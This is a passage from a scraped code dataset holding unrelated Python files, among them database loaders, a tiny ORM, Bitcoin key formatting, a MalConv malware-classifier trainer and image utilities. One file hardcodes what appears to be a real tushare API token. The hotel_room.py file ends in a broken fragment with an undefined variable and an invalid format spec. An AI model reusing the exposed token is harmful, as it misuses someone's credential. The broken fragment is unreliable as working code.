api.models.model_year_report_make import ModelYearReportMake\n\n\nclass ModelYearReportMakeSerializer(ModelSerializer):\n class Meta:\n model = ModelYearReportMake\n fields = (\n 'make',\n )\n"},"size":{"kind":"number","value":279,"string":"279"}}},{"rowIdx":874,"cells":{"max_stars_repo_path":{"kind":"string","value":"AutomateTheBoringStuff/sameName.py"},"max_stars_repo_name":{"kind":"string","value":"pythoncoder999/Python"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024508"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 26 23:49:56 2019\n\n@author: \n\"\"\"\n\ndef spam():\n eggs = \"spam local\"\n print(eggs) # prints \"spam local\"\n \ndef bacon():\n eggs = \"bacon local\"\n print(eggs) # prints \"bacon local\"\n spam()\n print(eggs) #prints \"bacon local\"\n\neggs = \"global\"\nbacon()\nprint(eggs) #prints \"global\"\n"},"size":{"kind":"number","value":345,"string":"345"}}},{"rowIdx":875,"cells":{"max_stars_repo_path":{"kind":"string","value":"module4-acid-and-database-scalability-tradeoffs/create_titanic.py"},"max_stars_repo_name":{"kind":"string","value":"bbrauser/DS-Unit-3-Sprint-2-SQL-and-Databases"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023575"},"content":{"kind":"string","value":"# imports\nimport psycopg2\nimport pandas as pd\nfrom psycopg2.extras import execute_values\n\n\n# reading in titanic Data\ndf = pd.read_csv('titanic.csv')\n\n\n# renaming columns in order to have them read into elephant\ndf['Siblings/Spouses Aboard'].rename('siblingsspouse', axis=1)\ndf['Parents/Children Aboard'].rename('parentschildren', axis=1)\n\n\n# getting rid of unecessary apostrophies\ndf['Name'] = df['Name'].str.replace(\"'\", \"\")\n\n\n# creds for cloud DB, password is \ndbname = 'cwsewxgg'\nuser = 'cwsewxgg' # ElephantSQL happens to use same name for db and user\npassword = ' ' # Sensitive! 
Don't share/commit\nhost = 'drona.db.elephantsql.com'\n\n\n# connection to cloud\npg_conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host)\npg_curs = pg_conn.cursor()\n\n\n# creating Titanic Table\ncreate_titanic_table = \"\"\"\nDROP TABLE IF EXISTS Titanic;\nCREATE TABLE Titanic (\n index INT,\n Survived INT,\n Pclass INT,\n Name TEXT,\n Sex TEXT,\n Age REAL,\n siblingsspouse INT,\n parentschildren INT,\n Fare REAL\n);\n\"\"\"\n\n\n# running table and committing table\npg_curs.execute(create_titanic_table)\npg_conn.commit()\n\n\n# using the execute_values function - Would like to go over this again to enhance my understanding\nexecute_values(pg_curs, \"\"\"\nINSERT INTO Titanic\n(Survived, Pclass, Name, Sex, Age, siblingsspouse, parentschildren, Fare)\nVALUES %s;\n\"\"\", [tuple(row) for row in df.values])\n\n\n# commit\npg_conn.commit()\npg_curs.execute(\"\"\"\nSELECT *\nFROM Titanic\nLIMIT 1;\n\"\"\")\n\n\n# printing to validate\nprint(pg_curs.fetchall())"},"size":{"kind":"number","value":1554,"string":"1,554"}}},{"rowIdx":876,"cells":{"max_stars_repo_path":{"kind":"string","value":"demo/tushare_native/broad_market_demo.py"},"max_stars_repo_name":{"kind":"string","value":"WZYStudio/QuantJob"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024099"},"content":{"kind":"string","value":"import tushare as ts\n\n# 这个数据里有vol, ma5,ma10什么的,还是好用的\nif __name__ == '__main__':\n ts.set_token('c88ef7fb2542e2f89e9c79c2d22ce2421511da6af7f905f60c7a29b4')\n days_deal = ts.get_hist_data('600584', start='2020-05-18', end='2020-05-21')\n print(days_deal)\n\n\n"},"size":{"kind":"number","value":261,"string":"261"}}},{"rowIdx":877,"cells":{"max_stars_repo_path":{"kind":"string","value":"orm/manager.py"},"max_stars_repo_name":{"kind":"string","value":"draihal/simple_orm_sqlite"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023771"},"content":{"kind":"string","value":"from .db_helpers import attrs, copy_attrs, render_create_table_stmt\n\n\nclass Manager:\n\n def __init__(self, db, model, type_check=True):\n self.db = db\n self.model = model\n self.table_name = model.__name__\n self.type_check = type_check\n if not self._hastable():\n self.db.executescript(render_create_table_stmt(self.model))\n\n def all(self):\n result = self.db.execute(f'SELECT * FROM {self.table_name}')\n return (self.create(**row) for row in result.fetchall())\n\n def create(self, **kwargs):\n obj = object.__new__(self.model)\n obj.__dict__ = kwargs\n return obj\n\n def delete(self, obj):\n sql = 'DELETE from %s WHERE id = ?'\n self.db.execute(sql % self.table_name, obj.id)\n\n def get(self, id):\n sql = f'SELECT * FROM {self.table_name} WHERE id = ?'\n result = self.db.execute(sql, id)\n row = result.fetchone()\n if not row:\n msg = 'Object%s with id does not exist: %s' % (self.model, id)\n raise ValueError(msg)\n return self.create(**row)\n\n def has(self, id):\n sql = f'SELECT id FROM {self.table_name} WHERE id = ?'\n result = self.db.execute(sql, id)\n return True if result.fetchall() else False\n\n def save(self, obj):\n if 'id' in obj.__dict__ and self.has(obj.id):\n msg = 'Object%s id already registred: %s' % (self.model, obj.id)\n raise ValueError(msg)\n clone = copy_attrs(obj, remove=['id'])\n self.type_check and self._isvalid(clone)\n column_names = '%s' % ', '.join(clone.keys())\n column_references = '%s' % ', '.join('?' 
for i in range(len(clone)))\n sql = 'INSERT INTO %s (%s) VALUES (%s)'\n sql = sql % (self.table_name, column_names, column_references)\n result = self.db.execute(sql, *clone.values())\n obj.id = result.lastrowid\n return obj\n\n def update(self, obj):\n clone = copy_attrs(obj, remove=['id'])\n self.type_check and self._isvalid(clone)\n where_expressions = '= ?, '.join(clone.keys()) + '= ?'\n sql = 'UPDATE %s SET %s WHERE id = ?' % (self.table_name, where_expressions)\n self.db.execute(sql, *(list(clone.values()) + [obj.id]))\n\n def _hastable(self):\n sql = 'SELECT name len FROM sqlite_master WHERE type = ? AND name = ?'\n result = self.db.execute(sql, 'table', self.table_name)\n return True if result.fetchall() else False\n\n def _isvalid(self, attr_values):\n attr_types = attrs(self.model)\n value_types = {a: v.__class__ for a, v in attr_values.items()}\n\n for attr, value_type in value_types.items():\n if value_type is not attr_types[attr]:\n msg = \"%s value should be type %s not %s\"\n raise TypeError(msg % (attr, attr_types[attr], value_type))\n"},"size":{"kind":"number","value":2867,"string":"2,867"}}},{"rowIdx":878,"cells":{"max_stars_repo_path":{"kind":"string","value":"SoftUni-Basic/conditional_statements_advanced/exercises/hotel_room.py"},"max_stars_repo_name":{"kind":"string","value":"Darkartt/SoftUni"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024389"},"content":{"kind":"string","value":"month = input()\ndays_sleeping = int(input())\n\nprice_studio = 0\nprice_apartment = 0\n\nif month == \"May\" or month == \"October\":\n price_studio = days_sleeping * 50\n price_apartment = days_sleeping * 65\n if days_sleeping > 14:\n price_studio *= 0.70\n elif days_sleeping > 7:\n price_studio *= 0.95\n\nif month == \"June\" or month == \"September\":\n price_studio = days_sleeping * 75.20\n price_apartment = days_sleeping * 68.70\n if days_sleeping > 14:\n price_studio *= 0.80\n\nif month == \"July\" or month == \"August\":\n price_studio = days_sleeping * 76\n price_apartment = days_sleeping * 77\n\nif days_sleeping > 14:\n price_apartment *= 0.90\n\n\nprint(f\"Apartment: {price_apartment:.2f} lv.\")\nprint(f\"Studio: {price_studio:.2f} lv.\")\n\nif diff < 59:\n print(\"Early\")\n print(f\"{diff} before the start\")\nelif diff > 59:\n hours = diff // 60\n minutes = diff = 60\n print(\"Early\")\n print(f\"{hours}:{minutes:.2d} hours before the start\")"},"size":{"kind":"number","value":978,"string":"978"}}},{"rowIdx":879,"cells":{"max_stars_repo_path":{"kind":"string","value":"migrations/versions/0d2523c0cb8a_.py"},"max_stars_repo_name":{"kind":"string","value":"monstersun/blog"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023130"},"content":{"kind":"string","value":"\"\"\"empty message\n\nRevision ID: 0d2523c0cb8a\nRevises: \nCreate Date: 2017-12-13 19:29:39.010490\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = ''\ndown_revision = ''\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('Post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('body', sa.TEXT(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('auther_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['auther_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_Post_timestamp'), 'Post', ['timestamp'], unique=False)\n op.add_column('users', sa.Column('avatar_hash', sa.String(length=64), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('users', 'avatar_hash')\n op.drop_index(op.f('ix_Post_timestamp'), table_name='Post')\n op.drop_table('Post')\n # ### end Alembic commands ###\n"},"size":{"kind":"number","value":1174,"string":"1,174"}}},{"rowIdx":880,"cells":{"max_stars_repo_path":{"kind":"string","value":"mkrandomkeys.py"},"max_stars_repo_name":{"kind":"string","value":"jadeblaquiere/keymaster"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024286"},"content":{"kind":"string","value":"#!/usr/bin/python\n# Copyright (c) 2016, <>\n# All rights reserved\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of ecpy nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom ecpy.point import Point, Generator\nimport ecpy.curves as curves\nfrom Crypto.Random import random\nfrom Crypto.Hash import RIPEMD\nfrom hashlib import sha256\nimport hashlib\nfrom binascii import hexlify, unhexlify\nfrom base58 import b58encode, b58decode\n\n# set up elliptic curve environment\nc = curves.curve_secp256k1\nPoint.set_curve(c)\nG = Generator(c['G'][0], c['G'][1])\n\n#mainnet\npub_prefix = '00'\nprv_prefix = '80'\n#testnet\npub_prefix = '6f'\nprv_prefix = 'ef'\n#simtest\npub_prefix = '3f'\nprv_prefix = '64'\n#ctindigonet\npub_prefix = '1c'\nprv_prefix = 'bb'\n#ctrednet\npub_prefix = '50'\nprv_prefix = 'a3'\n\npub_prefix = '1c'\nprv_prefix = 'bb'\n\n\ndef priv_key_fmt(prefix, keyhx):\n # generate WIF format\n # see: https://en.bitcoin.it/wiki/Wallet_import_format\n # add header prefix\n h_key = prefix + keyhx\n # calc checksum\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_key + cksum))\n\ndef priv_key_fmt_C(prefix, keyhx):\n # generate WIF format\n # see: https://en.bitcoin.it/wiki/Wallet_import_format\n # add header prefix\n h_key = prefix + keyhx + '01'\n # calc checksum\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_key + cksum))\n\ndef priv_key_decode(keyb58):\n raw = hexlify(b58decode(keyb58))\n h_key = raw[:66]\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n if cksum != raw[66:].decode('utf-8'):\n raise ValueError('checksum mismatch')\n return h_key[2:].decode('utf-8')\n\ndef priv_key_decode_C(keyb58):\n raw = hexlify(b58decode(keyb58))\n h_key = raw[:68]\n cksum = sha256(sha256(unhexlify(h_key)).digest()).hexdigest()[:8]\n if raw[66:68].decode('utf-8') != '01':\n raise ValueError('format error')\n if cksum != raw[68:].decode('utf-8'):\n raise ValueError('checksum mismatch')\n return h_key[2:66].decode('utf-8')\n\ndef pub_key_fmt(prefix, keyhx):\n # generate V1 Address format\n # see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses\n # hash key - sha256 then ripemd160\n h = RIPEMD.new(sha256(unhexlify(keyhx)).digest())\n # add header prefix\n h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')\n # calc checksum\n cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_hashkey + cksum))\n\ndef pub_key_fmt_C(prefix, keyhx):\n # generate V1 Address format\n # see: https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses\n # hash key - sha256 then ripemd160\n keyval = keyhx\n keybin = int(keyhx,16)\n if keyhx[:2] == '04':\n keyval = ('03' if (keybin % 2) else '02') + keyhx[2:66]\n elif (keyhx[:2] != '02') and (keyhx[:2] != '03'):\n raise ValueError('input is not ECC point format')\n print('keyval = ' + keyval)\n h = RIPEMD.new(sha256(unhexlify(keyval)).digest())\n # add header prefix\n h_hashkey = prefix + hexlify(h.digest()).decode('utf-8')\n # calc checksum\n 
cksum = sha256(sha256(unhexlify(h_hashkey)).digest()).hexdigest()[:8]\n # encode base58\n return b58encode(unhexlify(h_hashkey + cksum))\n\nif __name__ == '__main__':\n # private key is a random number between 1 and n \n # (where n is \"order\" of curve generator point G)\n p = random.randint(1,c['n']-1)\n # p = 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D\n # p = 0x1111111111111111111111111111111111111111111111111111111111111111;\n phx = '%064x' % p\n print(\"PRIVATE KEY MATH : \")\n print('rand privkey = ' + phx)\n \n wif_priv = priv_key_fmt(prv_prefix, phx)\n print(\"WIF privkey = \" + wif_priv)\n if p == 0x0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D:\n assert wif_priv == ''\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_priv == ''\n \n #check that we can recover p from WIF\n rhx = priv_key_decode(wif_priv)\n # print('rxh, phx =', rhx, phx)\n assert rhx == phx\n \n wif_priv_C = priv_key_fmt_C(prv_prefix, phx)\n print(\"WIF privkey Compressed = \" + wif_priv_C)\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_priv_C == ''\n \n #check that we can recover p from WIF\n rhx = priv_key_decode_C(wif_priv_C)\n # print('rxh, phx =', rhx, phx)\n assert rhx == phx\n \n print(\"PUBLIC KEY MATH : \")\n # p = 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725\n P = G * p\n Pa = P.affine()\n pbhx = '04' + ('%064x' % Pa[0]) + ('%064x' % Pa[1])\n print(\"point long fmt = \" + pbhx)\n wif_pub = pub_key_fmt(pub_prefix, pbhx)\n print(\"WIF pubkey = \" + wif_pub)\n if p == 0x18E14A7B6A307F426A94F8114701E7C8E774E7F9A47E2C2035DB29A206321725:\n assert wif_pub == ''\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_pub == ''\n \n wif_pub_C = pub_key_fmt_C(pub_prefix, pbhx)\n print(\"WIF pubkey Compressed = \" + wif_pub_C)\n if p == 0x1111111111111111111111111111111111111111111111111111111111111111:\n assert wif_pub_C == ''\n \n if False:\n for i in range(0,255):\n ihx = '%02x' % i\n print(ihx + ' :priv: ' + priv_key_fmt(ihx, phx) + ' ' + priv_key_fmt_C(ihx, phx)) \n\n for i in range(0,255):\n ihx = '%02x' % i\n print(ihx + ' :pub: ' + pub_key_fmt(ihx, pbhx))\n \n if False:\n \n refprv = ''\n refder = ''\n refderp = ''\n \n refhx = hexlify(b58decode(refprv)).decode('utf8')\n rdehx = hexlify(b58decode(refder)).decode('utf8')\n rdphx = hexlify(b58decode(refderp)).decode('utf8')\n \n print('rhx ' + refhx)\n print('rdvx ' + rdehx)\n print('rdpx ' + rdphx)\n \n refprv = ''\n refder = ''\n refderp = ''\n \n refhx = hexlify(b58decode(refprv)).decode('utf8')\n rdehx = hexlify(b58decode(refder)).decode('utf8')\n rdphx = hexlify(b58decode(refderp)).decode('utf8')\n \n print('crhx ' + refhx)\n print('crdvx ' + rdehx)\n print('crdpx ' + rdphx)\n \n refprv = ''\n refder = ''\n refderp = ''\n \n refhx = hexlify(b58decode(refprv)).decode('utf8')\n rdehx = hexlify(b58decode(refder)).decode('utf8')\n rdphx = hexlify(b58decode(refderp)).decode('utf8')\n \n print('zrhx ' + refhx)\n print('zrdvx ' + rdehx)\n print('zrdpx ' + rdphx)\n"},"size":{"kind":"number","value":8238,"string":"8,238"}}},{"rowIdx":881,"cells":{"max_stars_repo_path":{"kind":"string","value":"examples/drf_pdf_examples/drf_pdf_examples/urls.py"},"max_stars_repo_name":{"kind":"string","value":"fasih/drf-pdf"},"max_stars_count":{"kind":"number","value":27,"string":"27"},"id":{"kind":"string","value":"2023714"},"content":{"kind":"string","value":"from django.conf.urls import patterns, 
url\nfrom simple.views import SimpleExample\n\n\nurlpatterns = patterns(\n '',\n url(r'^simple/$', SimpleExample.as_view()),\n)\n"},"size":{"kind":"number","value":166,"string":"166"}}},{"rowIdx":882,"cells":{"max_stars_repo_path":{"kind":"string","value":"malconv-microsoft.py"},"max_stars_repo_name":{"kind":"string","value":"PowerLZY/MalConv-Pytorch"},"max_stars_count":{"kind":"number","value":9,"string":"9"},"id":{"kind":"string","value":"2022828"},"content":{"kind":"string","value":"import sys\nimport os\nimport time\nfrom src.model import *\nfrom src.util import *\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data import DataLoader\nfrom sklearn.model_selection import train_test_split\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nlabel_path = \"/public/malware_dataset/kaggle_microsoft_9_10000/\"\ntrain_data_path = label_path + \"bytes/\" # Training data\ntrain_label_path = label_path + \"kaggle_microsoft_trainlabels.csv\" # Training label\n#valid_label_path = label_path + \"example-valid-label.csv\" # Validation Label\n\n#name\nexp_name = \"malconv-classification\"\n\n# Parameter\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\" # single-GPU\n\nuse_gpu = True #\nuse_cpu = 32 # Number of cores to use for data loader\ndisplay_step = 5 # Std output update rate during training 和 保存训练结果步长\ntest_step = 50 # Test per n step\nlearning_rate = 0.0001 #\nmax_step = 1000 # Number of steps to train\nbatch_size = 768 #\nfirst_n_byte = (\n 100000 # First N bytes of a PE file as the input of MalConv (defualt: 2 million)\n)\nwindow_size = 512 # Kernel size & stride for Malconv (defualt : 500)\n\n# output path\nlog_dir = \"/log/\"\npred_dir = \"/pred/\"\ncheckpoint_dir = \"/checkpoint/\"\nlog_file_path = log_dir + exp_name + \".log\"\nchkpt_acc_path = checkpoint_dir + exp_name + \"1000.pt\"\npred_path = pred_dir + exp_name + \".pred\"\n\ndf = pd.read_csv(train_label_path)\ntrain, valid, train_label, valid_label = train_test_split(\n df[\"Id\"],\n df[\"Class\"],\n test_size=0.2,\n stratify=df[\"Class\"],\n random_state=100,\n)\n\"\"\"\n# Dataset preparation\nclass ExeDataset(Dataset):\n\tdef __init__(self, fp_list, data_path, label_list, first_n_byte=2000000):\n\t\tself.fp_list = fp_list\n\t\tself.data_path = data_path\n\t\tself.label_list = label_list\n\t\tself.first_n_byte = first_n_byte\n\n\tdef __len__(self):\n\t\treturn len(self.fp_list)\n\n\tdef __getitem__(self, idx):\n\t\ttry:\n\t\t\twith open(self.data_path + self.fp_list[idx],'rb') as f:\n\t\t\t\ttmp = [i+1 for i in f.read()[:self.first_n_byte]] # index 0 will be special padding index 每个值加一\n\t\t\t\ttmp = tmp+[0]*(self.first_n_byte-len(tmp))\n\t\texcept:\n\t\t\twith open(self.data_path + self.fp_list[idx].lower(),'rb') as f:\n\t\t\t\ttmp = [i+1 for i in f.read()[:self.first_n_byte]]\n\t\t\t\ttmp = tmp+[0]*(self.first_n_byte-len(tmp))\n\n\t\treturn np.array(tmp), np.array([self.label_list[idx]])\n\"\"\"\n\ntrainset = pd.DataFrame({\"id\": train, \"labels\": train_label})\nvalidset = pd.DataFrame({\"id\": valid, \"labels\": valid_label})\ntrainloader = DataLoader(\n ExeDataset(\n list(trainset[\"id\"]), train_data_path, list(trainset[\"labels\"]), first_n_byte\n ),\n batch_size=batch_size,\n shuffle=False,\n num_workers=use_cpu,\n pin_memory=True,\n)\nvalidloader = DataLoader(\n ExeDataset(\n list(validset[\"id\"]), train_data_path, list(validset[\"labels\"]), first_n_byte\n ),\n batch_size=batch_size,\n shuffle=False,\n num_workers=use_cpu,\n pin_memory=True,\n)\nUSE_CUDA = 
torch.cuda.is_available()\ndevice = torch.device(\"cuda:1\" if USE_CUDA else \"cpu\")\n\nmalconv = MalConv(input_length=first_n_byte, window_size=window_size)\nmalconv = nn.DataParallel(malconv, device_ids=[1,2,3]) # multi-GPU\n\n#malconv = MalConvBase(8, 4096, 128, 32)\nbce_loss = nn.BCEWithLogitsLoss()\nce_loss = nn.CrossEntropyLoss()\nadam_optim = optim.Adam([{\"params\": malconv.parameters()}], lr=learning_rate)\nsigmoid = nn.Sigmoid()\n\nif use_gpu:\n malconv = malconv.to(device)\n bce_loss = bce_loss.to(device)\n sigmoid = sigmoid.to(device)\n\nstep_msg = \"step-{}-loss-{:.6f}-acc-{:.4f}-time-{:.2f}s\"\nvalid_msg = \"step-{}-tr_loss-{:.6f}-tr_acc-{:.4f}-val_loss-{:.6f}-val_acc-{:.4f}\"\nlog_msg = \"{}, {:.6f}, {:.4f}, {:.6f}, {:.4f}, {:.2f}\"\nhistory = {}\nhistory[\"tr_loss\"] = []\nhistory[\"tr_acc\"] = []\ntrain_acc = [] # 保存训练结果\n\nvalid_best_acc = 0.0\ntotal_step = 0\nstep_cost_time = 0\nvalid_idx = list(validset[\"id\"])\n\nwhile total_step < max_step:\n\n # Training\n for step, batch_data in enumerate(trainloader):\n start = time.time()\n\n adam_optim.zero_grad()\n\n cur_batch_size = batch_data[0].size(0)\n\n exe_input = batch_data[0].to(device) if use_gpu else batch_data[0]\n exe_input = Variable(exe_input.long(), requires_grad=False)\n\n label = batch_data[1].to(device) if use_gpu else batch_data[1]\n label = Variable(label, requires_grad=False)\n label = label.squeeze() - 1\n\n pred = malconv(exe_input)\n loss = ce_loss(pred, label)\n loss.backward()\n adam_optim.step()\n\n _, predicted = torch.max(pred.data, 1)\n train_Macc = (label.cpu().data.numpy().astype(int) == (predicted.cpu().data.numpy()).astype(int)).sum().item()\n train_Macc = train_Macc / cur_batch_size\n\n if (step + 1) % display_step == 0:\n print(\"train:{}\".format(train_Macc))\n\n total_step += 1\n # Interupt for validation\n if total_step % test_step == 0:\n break\n\n for step, val_batch_data in enumerate(validloader):\n\n cur_batch_size = val_batch_data[0].size(0)\n\n exe_input = val_batch_data[0].to(device) if use_gpu else val_batch_data[0]\n exe_input = Variable(exe_input.long(), requires_grad=False)\n\n label = val_batch_data[1].to(device) if use_gpu else val_batch_data[1]\n label = Variable(label, requires_grad=False)\n label = label.squeeze() - 1\n\n pred = malconv(exe_input)\n loss = ce_loss(pred, label)\n # loss.backward()\n # adam_optim.step()\n\n _, predicted = torch.max(pred.data, 1)\n val_Macc = (label.cpu().data.numpy().astype(int) == (predicted.cpu().data.numpy()).astype(int)).sum().item()\n val_Macc = val_Macc / cur_batch_size\n\n if (step + 1) % display_step == 0:\n print(\"test:{}\".format(val_Macc))\n\n\n\n"},"size":{"kind":"number","value":5763,"string":"5,763"}}},{"rowIdx":883,"cells":{"max_stars_repo_path":{"kind":"string","value":"chandralc/config.py"},"max_stars_repo_name":{"kind":"string","value":"sammarth-k/Chandra-Lightcurve-Download"},"max_stars_count":{"kind":"number","value":27,"string":"27"},"id":{"kind":"string","value":"2023922"},"content":{"kind":"string","value":"\"\"\"Create configuration files.\"\"\"\n\n# PSL modules\nimport os\nimport inspect\n\n# chandralc modules\nfrom chandralc import convert\n\nclc_path = os.path.dirname(inspect.getfile(convert))\n\n\ndef mpl_backend(switch=False):\n \"\"\"Switches between agg and default matplotlib backend.\n\n Parameters\n ----------\n switch: bool\n Turn agg on or off, by default False\n \"\"\"\n\n with open(clc_path + \"/config/mpl_backend.chandralc\", \"w\") as f:\n if switch is False:\n f.write(\"False\")\n else:\n 
f.write(\"True\")\n"},"size":{"kind":"number","value":542,"string":"542"}}},{"rowIdx":884,"cells":{"max_stars_repo_path":{"kind":"string","value":"util/unicorn_test.py"},"max_stars_repo_name":{"kind":"string","value":"Pusty/Obfuscat"},"max_stars_count":{"kind":"number","value":7,"string":"7"},"id":{"kind":"string","value":"2024327"},"content":{"kind":"string","value":"import sys\nfrom unicorn import *\nfrom unicorn.arm_const import *\n\nref = open(sys.argv[1], \"rb\")\nref_data = ref.read()\nref.close()\n\nmu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)\nmu.mem_map(0x1000000, 2 * 1024 * 1024)\nmu.mem_map(0x2000000, 2 * 1024 * 1024)\nmu.mem_map(0x4000000, 2 * 1024 * 1024)\nmu.mem_write(0x1000000, ref_data)\n\nmu.mem_write(0x2000000, b'SECRET')\n\n\nmu.reg_write(UC_ARM_REG_R0, 0x2000000)\nmu.reg_write(UC_ARM_REG_R1, 6)\nmu.reg_write(UC_ARM_REG_R2, 0)\nmu.reg_write(UC_ARM_REG_R3, 0)\n\nmu.reg_write(UC_ARM_REG_SP, 0x4010000)\nmu.reg_write(UC_ARM_REG_LR, 0xDEADC0DE)\n\ntry:\n mu.emu_start(0x1000001, 0x1000000 + len(ref_data))\nexcept Exception as e:\n if mu.reg_read(UC_ARM_REG_PC) != 0xDEADC0DE:\n raise e\n\nprint(mu.reg_read(UC_ARM_REG_R0))"},"size":{"kind":"number","value":751,"string":"751"}}},{"rowIdx":885,"cells":{"max_stars_repo_path":{"kind":"string","value":"rmp_nav/common/image_combiner.py"},"max_stars_repo_name":{"kind":"string","value":"KH-Kyle/rmp_nav"},"max_stars_count":{"kind":"number","value":30,"string":"30"},"id":{"kind":"string","value":"2022863"},"content":{"kind":"string","value":"import numpy as np\nimport cv2\n\n\ndef _pad_width_center(w, target_w):\n left = (target_w - w) // 2\n right = target_w - w - left\n return left, right\n\n\ndef _pad_width_right(w, target_w):\n return 0, target_w - w\n\n\ndef _pad_height_center(h, target_h):\n top = (target_h - h) // 2\n bottom = target_h - h - top\n return top, bottom\n\n\ndef _pad_height_bottom(h, target_h):\n return 0, target_h - h\n\n\ndef VStack(*imgs, align='center'):\n max_w = max([_.shape[1] for _ in imgs])\n imgs_padded = []\n\n if align == 'center':\n for img in imgs:\n left, right = _pad_width_center(img.shape[1], max_w)\n imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))\n\n elif align == 'left':\n for img in imgs:\n left, right = _pad_width_right(img.shape[1], max_w)\n imgs_padded.append(cv2.copyMakeBorder(img, 0, 0, left, right, cv2.BORDER_CONSTANT))\n\n else:\n raise ValueError('Unsupported alignment %s' % align)\n\n return np.concatenate(imgs_padded, axis=0)\n\n\ndef HStack(*imgs, align='center'):\n max_h = max([_.shape[0] for _ in imgs])\n\n imgs_padded = []\n\n if align == 'center':\n for img in imgs:\n top, bottom = _pad_height_center(img.shape[0], max_h)\n imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))\n\n elif align == 'top':\n for img in imgs:\n top, bottom = _pad_height_bottom(img.shape[0], max_h)\n imgs_padded.append(cv2.copyMakeBorder(img, top, bottom, 0, 0, cv2.BORDER_CONSTANT))\n\n else:\n raise ValueError('Unsupported alignment %s' % align)\n\n return np.concatenate(imgs_padded, axis=1)\n\n\ndef Grid(*imgs, n_col=1, align='center'):\n chunks = [imgs[i:i + n_col] for i in range(0, len(imgs), n_col)]\n row_imgs = [HStack(*_, align=align) for _ in chunks]\n return VStack(*row_imgs, 
